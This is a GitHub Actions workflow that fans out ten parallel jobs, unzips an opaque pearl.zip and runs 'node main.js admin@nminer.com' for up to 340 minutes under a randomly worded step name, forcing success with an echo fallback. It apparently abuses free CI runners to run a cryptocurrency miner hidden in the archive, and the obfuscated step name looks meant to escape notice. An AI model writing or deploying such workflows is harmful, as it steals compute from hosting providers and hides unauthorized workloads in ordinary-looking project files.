name: pearl
on:
  push:
    branches: [ "main" ]
    paths:
      - "pearl.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { os: 0 }
          - { os: 1 }
          - { os: 2 }
          - { os: 3 }
          - { os: 4 }
          - { os: 5 }
          - { os: 6 }
          - { os: 7 }
          - { os: 8 }
          - { os: 9 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20

      - name: Unzip pearl.zip
        run: |
          sudo apt install -y unzip
          unzip pearl.zip

      - name: along yuck depute charter consequently
        run: |
          npm install --ignore-scripts
          timeout 340m node main.js admin@nminer.com || echo "pearl executed"